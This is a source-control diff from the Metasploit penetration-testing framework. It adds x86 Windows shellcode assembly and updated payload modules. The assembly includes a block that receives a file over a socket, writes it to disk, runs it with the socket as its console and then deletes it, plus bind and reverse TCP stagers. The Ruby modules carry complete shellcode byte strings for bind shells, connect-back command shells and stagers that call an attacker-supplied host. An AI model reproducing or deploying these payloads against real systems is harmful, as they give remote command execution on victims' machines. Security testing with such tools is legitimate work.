call ebp ; CreateFileA( ... );
mov ebx, eax ; EBX = the new file handle
; Receive the size of the incoming file...
push esp ; Alloc a dword for the recv buffer param
mov esi, esp ; Save pointer
push byte 0 ; Flags
push byte 4 ; Length = sizeof( DWORD );
push esi ; The 4 byte buffer on the stack to hold the second stage length
push edi ; The saved socket
push 0x5FC8D902 ; hash( "ws2_32.dll", "recv" )
call ebp ; recv( s, &dwLength, 4, 0 );
; Alloc a RW buffer for the incoming file...
mov esi, [esi] ; Dereference the pointer to the second stage length
push byte 0x04 ; PAGE_READWRITE
push 0x1000 ; MEM_COMMIT
push esi ; Push the newly recieved second stage length.
push byte 0 ; NULL as we dont care where the allocation is.
push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" )
call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_READWRITE );
push ebx ; Save the file handle for later call to CloseHandle
; setup the parameters for subsequent call to WriteFile (saves us trying to preserve various registers)
push ebx ; Alloc a dword for the bytes written param
mov ecx, esp ; Save this address
push byte 0 ; null as we dont set an overlapped param
push ecx ; Pointer to the number of bytes written output param
push esi ; Push the buffer length
push eax ; Push the newly allocated RW buffer
push ebx ; Push the hFile param
mov ebx, eax ; EBX = our new memory address for the incoming file
; read in the incoming file...
read_more: ;
push byte 0 ; Flags
push esi ; Length
push ebx ; The current address into our incoming files RW buffer
push edi ; The saved socket
push 0x5FC8D902 ; hash( "ws2_32.dll", "recv" )
call ebp ; recv( s, buffer, length, 0 );
add ebx, eax ; buffer += bytes_received
sub esi, eax ; length -= bytes_received
test esi, esi ; Test length
jnz read_more ; Continue if we have more to read
; write the entire files buffer to disk...
push 0x5BAE572D ; hash( "kernel32.dll", "WriteFile" )
call ebp ; WriteFile( hFile, pBuffer, len, &out, 0 );
pop ecx ; Restore esp to the correct location for the next call
; close the file handle, we dont need to push the handle as it is allready pushed onto stack
push 0x528796C6 ; hash( "kernel32.dll", "CloseHandle" )
call ebp ; CloseHandle( hFile );
; execute the file...
push edi ; Our socket becomes the processes hStdError
push edi ; Our socket becomes the processes hStdOutput
push edi ; Our socket becomes the processes hStdInput
xor esi, esi ; Clear ESI for all the NULL's we need to push
push byte 18 ; We want to place (18 * 4) = 72 null bytes onto the stack
pop ecx ; Set ECX for the loop
push_loop2: ;
push esi ; Push a null dword
loop push_loop2 ; Keep looping untill we have pushed enough nulls
mov word [esp+60], 0x0101 ; Set the STARTUPINFO Structure's dwFlags to STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW
lea eax, [esp+16] ; Set EAX as a pointer to our STARTUPINFO Structure
mov byte [eax], 68 ; Set the size of the STARTUPINFO Structure
; perform the call to CreateProcessA
push esp ; Push the pointer to the PROCESS_INFORMATION Structure
push eax ; Push the pointer to the STARTUPINFO Structure
push esi ; The lpCurrentDirectory is NULL so the new process will have the same current directory as its parent
push esi ; The lpEnvironment is NULL so the new process will have the same enviroment as its parent
push esi ; We dont specify any dwCreationFlags
inc esi ; Increment ESI to be one
push esi ; Set bInheritHandles to TRUE in order to inheritable all possible handle from the parent
dec esi ; Decrement ESI back down to zero
push esi ; Set lpThreadAttributes to NULL
push esi ; Set lpProcessAttributes to NULL
push dword [esp+120] ; Set the lpCommandLine to run the file (Use the saved pointer to the file path)
push esi ; Set lpApplicationName to NULL as we are using the command line param instead
push 0x863FCC79 ; hash( "kernel32.dll", "CreateProcessA" )
call ebp ; CreateProcessA( 0, &file, 0, 0, TRUE, 0, 0, 0, &si, &pi );
; perform the call to WaitForSingleObject
mov eax, esp ; Save pointer to the PROCESS_INFORMATION Structure
dec esi ; Decrement ESI down to -1 (INFINITE)
push esi ; Push INFINITE inorder to wait forever
inc esi ; Increment ESI back to zero
push dword [eax] ; Push the handle from our PROCESS_INFORMATION.hProcess
push 0x601D8708 ; hash( "kernel32.dll", "WaitForSingleObject" )
call ebp ; WaitForSingleObject( pi.hProcess, INFINITE );
; close the socket...
push edi ; Push the socket to close
push 0x614D6E75 ; hash( "ws2_32.dll", "closesocket" )
call ebp ; closesocket( s );
; delete the file...
push dword [esp+88] ; Push the saved pointer to the file path
push 0x13DD2ED7 ; hash( "kernel32.dll", "DeleteFileA" )
call ebp ; DeleteFileA( &file );
; finish up with the EXITFUNK
%include "./src/block/block_exitfunk.asm"

19
external/source/shellcode/windows/x86/src/stager/stager_bind_tcp_nx.asm vendored Normal file
View File

@ -0,0 +1,19 @@
;-----------------------------------------------------------------------------;
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Version: 1.0 (24 July 2009)
; Size: 301 bytes
; Build: >build.py stager_bind_tcp_nx
;-----------------------------------------------------------------------------;
[BITS 32]
[ORG 0]
cld ; Clear the direction flag.
call start ; Call start, this pushes the address of 'api_call' onto the stack.
%include "./src/block/block_api.asm"
start: ;
pop ebp ; pop off the address of 'api_call' for calling later.
%include "./src/block/block_bind_tcp.asm"
; By here we will have performed the bind_tcp connection and EDI will be our socket.
%include "./src/block/block_recv.asm"
; By now we will have recieved in the second stage into a RWX buffer and be executing it

20
external/source/shellcode/windows/x86/src/stager/stager_reverse_tcp_nx.asm vendored Normal file
View File

@ -0,0 +1,20 @@
;-----------------------------------------------------------------------------;
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Version: 1.0 (24 July 2009)
; Size: 274 bytes
; Build: >build.py stager_reverse_tcp_nx
;-----------------------------------------------------------------------------;
[BITS 32]
[ORG 0]
cld ; Clear the direction flag.
call start ; Call start, this pushes the address of 'api_call' onto the stack.
%include "./src/block/block_api.asm"
start: ;
pop ebp ; pop off the address of 'api_call' for calling later.
%include "./src/block/block_reverse_tcp.asm"
; By here we will have performed the reverse_tcp connection and EDI will be our socket.
%include "./src/block/block_recv.asm"
; By now we will have recieved in the second stage into a RWX buffer and be executing it

13
lib/msf/core/payload/windows.rb
View File

@ -15,9 +15,9 @@ module Msf::Payload::Windows
#
@@exit_types =
{
'seh' => 0x5f048af0, # SetUnhandledExceptionFilter
'thread' => 0x60e0ceef, # ExitThread
'process' => 0x73e2d87e, # ExitProcess
'seh' => 0xEA320EFE, # SetUnhandledExceptionFilter
'thread' => 0x0A2A1DE0, # ExitThread
'process' => 0x56A2B5F0, # ExitProcess
}
#
@ -64,6 +64,13 @@ module Msf::Payload::Windows
# ensure that the entire stage is read in.
#
def handle_intermediate_stage(conn, payload)
if( self.module_info['Stager']['RequiresMidstager'] == false )
conn.put( [ payload.length ].pack('V') )
# returning false allows stager.rb!handle_connection() to prepend the stage_prefix if needed
return false
end
return false if (payload.length < 512)
# The mid-stage works by reading in a four byte length in host-byte

29
lib/msf/core/payload/windows/exec.rb
View File

@ -1,3 +1,7 @@
##
# $Id$
##
module Msf
###
@ -5,6 +9,7 @@ module Msf
# Common command execution implementation for Windows.
#
###
module Payload::Windows::Exec
include Msf::Payload::Windows
@ -15,7 +20,7 @@ module Payload::Windows::Exec
'Name' => 'Windows Execute Command',
'Version' => '$Revision$',
'Description' => 'Execute an arbitrary command',
'Author' => 'vlad902',
'Author' => [ 'vlad902', 'Stephen Fewer <stephen_fewer[at]harmonysecurity[dot]com>' ],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
@ -23,16 +28,20 @@ module Payload::Windows::Exec
{
'Offsets' =>
{
'EXITFUNC' => [ 100, 'V' ]
'EXITFUNC' => [ 161, 'V' ]
},
'Payload' =>
"\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b" +
"\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99" +
"\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x04" +
"\x75\xe5\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb" +
"\x8b\x1c\x8b\x01\xeb\x89\x5c\x24\x04\xc3\x5f\x31\xf6\x60\x56\x64" +
"\x8b\x46\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\x89\xf8\x83" +
"\xc0\x6a\x50\x68\x7e\xd8\xe2\x73\x68\x98\xfe\x8a\x0e\x57\xff\xe7"
'Payload' => "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
"\x6A\x01\x8D\x85\xB9\x00\x00\x00\x50\x68\x31\x8B\x6F\x87\xFF\xD5" +
"\xBB\xE0\x1D\x2A\x0A\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06\x7C\x0A" +
"\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF\xD5"
}
))

2
lib/msf/core/payload/windows/reflectivedllinject.rb
View File

@ -82,7 +82,7 @@ module Payload::Windows::ReflectiveDllInject
"\x68\x04\x00\x00\x00" + # push 0x4 ; signal we have attached
"\x50" + # push eax ; some value for hinstance
"\xFF\xD0" + # call eax ; call DllMain( somevalue, DLL_METASPLOIT_ATTACH, socket )
"\x68\xDE\xC0\xAD\xDE" + # push 0xDEADC0DE ; our EXITFUNC placeholder
"\x68\xE0\x1D\x2A\x0A" + # push 0x0A2A1DE0 ; our EXITFUNC placeholder (Default to ExitThread for migration)
"\x68\x05\x00\x00\x00" + # push 0x5 ; signal we have detached
"\x50" + # push eax ; some value for hinstance
"\xFF\xD3" # call ebx ; call DllMain( somevalue, DLL_METASPLOIT_DETACH, exitfunk )

57
modules/payloads/singles/windows/shell_bind_tcp.rb
View File

@ -24,7 +24,7 @@ module Metasploit3
'Name' => 'Windows Command Shell, Bind TCP Inline',
'Version' => '$Revision$',
'Description' => 'Listen for a connection and spawn a command shell',
'Author' => 'vlad902',
'Author' => [ 'vlad902', 'Stephen Fewer <stephen_fewer[at]harmonysecurity[dot]com>' ],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
@ -34,38 +34,31 @@ module Metasploit3
{
'Offsets' =>
{
'LPORT' => [ 162, 'n' ],
'EXITFUNC' => [ 308, 'V' ],
'LPORT' => [ 201, 'n' ],
'EXITFUNC' => [ 311, 'V' ],
},
'Payload' =>
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c" +
"\x24\x24\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b" +
"\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01" +
"\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d" +
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f" +
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb" +
"\x03\x2c\x8b\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64" +
"\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40" +
"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53" +
"\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0" +
"\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66" +
"\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09" +
"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53" +
"\x43\x53\xff\xd0\x66\x68\x11\x5c\x66\x53\x89\xe1" +
"\x95\x68\xa4\x1a\x70\xc7\x57\xff\xd6\x6a\x10\x51" +
"\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53" +
"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50" +
"\x54\x54\x55\xff\xd0\x93\x68\xe7\x79\xc6\x79\x57" +
"\xff\xd6\x55\xff\xd0\x66\x6a\x64\x66\x68\x63\x6d" +
"\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89" +
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93" +
"\x8d\x7a\x38\xab\xab\xab\x68\x72\xfe\xb3\x16\xff" +
"\x75\x44\xff\xd6\x5b\x57\x52\x51\x51\x51\x6a\x01" +
"\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53" +
"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83" +
"\xc4\x64\xff\xd6\x52\xff\xd0\x68\x7e\xd8\xe2\x73" +
"\x53\xff\xd6\xff\xd0"
'Payload' => "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07" +
"\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00" +
"\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF" +
"\xD5\x89\xC7\x31\xDB\x53\x68\x02\x00\x11\x5C\x89\xE6\x6A\x10\x56" +
"\x57\x68\xC2\xDB\x37\x67\xFF\xD5\x53\x57\x68\xB7\xE9\x38\xFF\xFF" +
"\xD5\x53\x53\x57\x68\x74\xEC\x3B\xE1\xFF\xD5\x57\x89\xC7\x68\x75" +
"\x6E\x4D\x61\xFF\xD5\x68\x63\x6D\x64\x00\x89\xE3\x57\x57\x57\x31" +
"\xF6\x6A\x12\x59\x56\xE2\xFD\x66\xC7\x44\x24\x3C\x01\x01\x8D\x44" +
"\x24\x10\xC6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4E\x56\x56\x53" +
"\x56\x68\x79\xCC\x3F\x86\xFF\xD5\x89\xE0\x4E\x56\x46\xFF\x30\x68" +
"\x08\x87\x1D\x60\xFF\xD5\xBB\xE0\x1D\x2A\x0A\x68\xA6\x95\xBD\x9D" +
"\xFF\xD5\x3C\x06\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F" +
"\x6A\x00\x53\xFF\xD5"
}
))
end

15
modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb
View File

@ -77,5 +77,18 @@ module Metasploit3
}
))
end
# for now we must let this payload use the old EXITFUNC hash values.
def replace_var(raw, name, offset, pack)
super
if( name == 'EXITFUNC' )
datastore[name] = 'thread' if not datastore[name]
raw[offset, 4] = [ 0x5F048AF0 ].pack(pack || 'V') if datastore[name] == 'seh'
raw[offset, 4] = [ 0x60E0CEEF ].pack(pack || 'V') if datastore[name] == 'thread'
raw[offset, 4] = [ 0x73E2D87E ].pack(pack || 'V') if datastore[name] == 'process'
return true
end
return false
end
end

54
modules/payloads/singles/windows/shell_reverse_tcp.rb
View File

@ -24,7 +24,7 @@ module Metasploit3
'Name' => 'Windows Command Shell, Reverse TCP Inline',
'Version' => '$Revision$',
'Description' => 'Connect back to attacker and spawn a command shell',
'Author' => 'vlad902',
'Author' => [ 'vlad902', 'Stephen Fewer <stephen_fewer[at]harmonysecurity[dot]com>' ],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
@ -34,36 +34,30 @@ module Metasploit3
{
'Offsets' =>
{
'LPORT' => [ 166, 'n' ],
'LHOST' => [ 160, 'ADDR' ],
'EXITFUNC' => [ 278, 'V' ],
'LPORT' => [ 203, 'n' ],
'LHOST' => [ 196, 'ADDR' ],
'EXITFUNC' => [ 284, 'V' ],
},
'Payload' =>
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c" +
"\x24\x24\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b" +
"\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01" +
"\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d" +
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f" +
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb" +
"\x03\x2c\x8b\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64" +
"\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40" +
"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53" +
"\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0" +
"\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66" +
"\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09" +
"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x43\x53\x43" +
"\x53\xff\xd0\x68\xff\xff\xff\xff\x66\x68\x11\x5c" +
"\x66\x53\x89\xe1\x95\x68\xec\xf9\xaa\x60\x57\xff" +
"\xd6\x6a\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68" +
"\x63\x6d\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89" +
"\xe2\x31\xc0\xf3\xaa\x95\x89\xfd\xfe\x42\x2d\xfe" +
"\x42\x2c\x8d\x7a\x38\xab\xab\xab\x68\x72\xfe\xb3" +
"\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51\x51\x51" +
"\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05" +
"\xce\x53\xff\xd6\x6a\xff\xff\x37\xff\xd0\x68\xe7" +
"\x79\xc6\x79\xff\x75\x04\xff\xd6\xff\x77\xfc\xff" +
"\xd0\x68\x7e\xd8\xe2\x73\x53\xff\xd6\xff\xd0"
'Payload' => "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07" +
"\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00" +
"\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF" +
"\xD5\x89\xC7\x68\x7F\x00\x00\x01\x68\x02\x00\x11\x5C\x89\xE6\x6A" +
"\x10\x56\x57\x68\x99\xA5\x74\x61\xFF\xD5\x68\x63\x6D\x64\x00\x89" +
"\xE3\x57\x57\x57\x31\xF6\x6A\x12\x59\x56\xE2\xFD\x66\xC7\x44\x24" +
"\x3C\x01\x01\x8D\x44\x24\x10\xC6\x00\x44\x54\x50\x56\x56\x56\x46" +
"\x56\x4E\x56\x56\x53\x56\x68\x79\xCC\x3F\x86\xFF\xD5\x89\xE0\x4E" +
"\x56\x46\xFF\x30\x68\x08\x87\x1D\x60\xFF\xD5\xBB\xE0\x1D\x2A\x0A" +
"\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06\x7C\x0A\x80\xFB\xE0\x75\x05" +
"\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF\xD5"
}
))
end

51
modules/payloads/stagers/windows/bind_tcp.rb
View File

@ -24,7 +24,7 @@ module Metasploit3
'Name' => 'Bind TCP Stager',
'Version' => '$Revision$',
'Description' => 'Listen for a connection',
'Author' => ['hdm', 'skape'],
'Author' => ['hdm', 'skape', 'Stephen Fewer <stephen_fewer[at]harmonysecurity[dot]com>'],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
@ -32,34 +32,27 @@ module Metasploit3
'Convention' => 'sockedi',
'Stager' =>
{
'Offsets' =>
{
'LPORT' => [ 276+1, 'n' ],
},
'Payload' =>
"\xfc"+
"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c" +
"\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32" +
"\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07" +
"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24" +
"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8" +
"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x31\xd2\x64\x8b\x52" +
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x6a\x18\x59\x31\xff\x31" +
"\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x81" +
"\xff\x5b\xbc\x4a\x6a\x8b\x5a\x10\x8b\x12\x75\xdb\x5e\x53\x68\x8e" +
"\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81" +
"\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x27\x00\x00\x00" +
"\x90\x01\x00\x00\xb6\x19\x18\xe7\xe7\x79\xc6\x79\xe5\x49\x86\x49" +
"\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9\x09\xf5\xad\xcb\xed\xfc\x3b" +
"\x77\x73\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x20\x51\xff\xd7\x89\xdf" +
"\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51\x53\xff\x34\x8f\xff\x55\x04" +
"\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54\xff\x37\xff\x55\x30\x31\xc0" +
"\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x2c\x89\xc7\x31\xdb\x53" +
"\x53\x68\x02\x00\x22\x11\x89\xe0\x6a\x10\x50\x57\xff\x55\x24\x53" +
"\x57\xff\x55\x28\x53\x54\x57\xff\x55\x20\x53\x57\x89\xc7\xff\x55" +
"\x1c\x6a\x40\x5e\x56\xc1\xe6\x06\x56\xc1\xe6\x08\x56\x6a\x00\xff" +
"\x55\x0c\x89\xc3\x6a\x00\x68\x00\x10\x00\x00\x53\x57\xff\x55\x18" +
"\xff\xd3"
'Offsets' => { 'LPORT' => [ 201, 'n' ] },
'RequiresMidstager' => false,
'Payload' => "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07" +
"\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00" +
"\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF" +
"\xD5\x89\xC7\x31\xDB\x53\x68\x02\x00\x11\x5C\x89\xE6\x6A\x10\x56" +
"\x57\x68\xC2\xDB\x37\x67\xFF\xD5\x53\x57\x68\xB7\xE9\x38\xFF\xFF" +
"\xD5\x53\x53\x57\x68\x74\xEC\x3B\xE1\xFF\xD5\x57\x89\xC7\x68\x75" +
"\x6E\x4D\x61\xFF\xD5\x6A\x00\x6A\x04\x56\x57\x68\x02\xD9\xC8\x5F" +
"\xFF\xD5\x8B\x36\x6A\x40\x68\x00\x10\x00\x00\x56\x6A\x00\x68\x58" +
"\xA4\x53\xE5\xFF\xD5\x89\xC3\x53\x6A\x00\x56\x53\x57\x68\x02\xD9" +
"\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75\xEC\xC3"
}
))
end

15
modules/payloads/stagers/windows/passivex.rb
View File

@ -100,5 +100,18 @@ module Metasploit3
# Return the updated payload
return p
end
# for now we must let this payload use the old EXITFUNC hash values.
def replace_var(raw, name, offset, pack)
super
if( name == 'EXITFUNC' )
datastore[name] = 'thread' if not datastore[name]
raw[offset, 4] = [ 0x5F048AF0 ].pack(pack || 'V') if datastore[name] == 'seh'
raw[offset, 4] = [ 0x60E0CEEF ].pack(pack || 'V') if datastore[name] == 'thread'
raw[offset, 4] = [ 0x73E2D87E ].pack(pack || 'V') if datastore[name] == 'process'
return true
end
return false
end
end

48
modules/payloads/stagers/windows/reverse_tcp.rb
View File

@ -24,7 +24,7 @@ module Metasploit3
'Name' => 'Reverse TCP Stager',
'Version' => '$Revision$',
'Description' => 'Connect back to the attacker',
'Author' => ['hdm', 'skape'],
'Author' => ['hdm', 'skape', 'Stephen Fewer <stephen_fewer[at]harmonysecurity[dot]com>'],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
@ -32,32 +32,26 @@ module Metasploit3
'Convention' => 'sockedi',
'Stager' =>
{
'Offsets' =>
{
'LHOST' => [ 263, 'ADDR' ],
'LPORT' => [ 270, 'n' ],
},
'Payload' =>
"\xfc\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45" +
"\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3" +
"\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74" +
"\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a" +
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01" +
"\xe8\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x31\xd2\x64\x8b" +
"\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x6a\x18\x59\x31\xff" +
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0" +
"\x81\xff\x5b\xbc\x4a\x6a\x8b\x5a\x10\x8b\x12\x75\xdb\x5e\x53\x68" +
